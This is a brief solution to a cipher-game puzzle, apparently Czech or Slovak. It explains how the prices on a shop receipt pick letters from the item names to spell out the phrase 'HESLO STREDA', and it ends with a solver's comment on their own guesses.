password: STREDA
The receipt lists items from a cipher-game shop; someone is evidently buying things they want to take to an (outdoor) cipher game. Each item can be named with a single word.
Next, we can notice that the prices of all items have the form X.Y0, where X ≤ Y. This could mean that the correct name of the item has Y letters and that we want to take the X-th of them.
Step by step we thus get these words and letters: batoH, cEruzka, termoSka, euroobaL, nOžnice, kompaS, zošiT, pRavítko, dEka, lepiDlo and baterkA/čelovkA. We read the hidden phrase „HESLO STREDA“.
(The word „zlatý“ is a reference to the book and film Zlatý kompas and is in the puzzle text to distinguish a kompas from a buzola.)
Aha, so external memory is not a book and the textile under your backside is not trousers :D I admit, the solution is better than what we made up :)